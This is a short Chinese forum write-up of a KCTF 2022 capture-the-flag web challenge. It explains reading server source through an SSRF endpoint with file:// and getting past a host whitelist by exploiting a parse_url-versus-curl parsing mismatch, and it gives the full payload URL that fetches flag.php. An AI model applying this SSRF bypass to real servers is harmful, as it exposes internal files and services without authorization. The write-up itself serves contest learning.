-
-
[原创]2022KCTF 春季赛 第四题 飞蛾扑火 WP
-
发表于: 2022-5-16 21:14
-
发现存在一个phpinfo和一个ssrf的地址
尝试file://去读ssrf文件源代码-url.php读到了源码
e93K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3g2)9J5k6e0x3$3i4K6u0W2x3e0b7#2i4K6u0W2x3e0f1%4i4K6y4m8z5o6l9@1y4q4)9J5c8Y4g2J5L8q4)9J5k6i4m8Z5M7q4)9K6c8Y4g2J5L8q4)9K6c8r3k6A6L8r3g2Q4x3@1q4Q4x3V1k6Q4x3V1j5I4x3U0N6Q4x3X3f1H3i4K6u0W2x3q4)9J5k6e0q4Q4x3V1k6$3j5i4u0Q4x3V1k6%4N6%4N6Q4x3V1k6Z5N6r3#2D9i4K6u0r3N6i4u0D9i4K6u0W2M7r3S2H3
看到了php_curl以及
1 2 3 4 5 6 7 | if($host=="ctf.pediy.com"||$host=="127.0.0.1"||$host=="localhost"){//echo curl_request("9daK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3#2)9J5k6e0f1%4i4K6u0W2x3U0f1@1i4K6u0W2y4o6u0Q4x3V1k6X3L8r3q4Y4i4K6u0W2M7r3S2H3","get",[],true,5);//get flag echo curl_request($url,'',"get",[],true,5);}else{die("host not allow");} |
这里需要绕过让host满足条件
因为存在curl一个特性:
a://b/../flag.php,parse_url会认为host是b,但是用phpcurl访问时相当于db1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4Q4x3V1k6X3L8r3q4Y4i4K6u0W2M7r3S2H3
构建
1 | http://121.36.145.157:8044/url.php?url=123.57.254.42://127.0.0.1/../flag.php |
读取flag
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2022-5-17 12:34
被柘狐编辑
,原因:
|
|
|---|---|
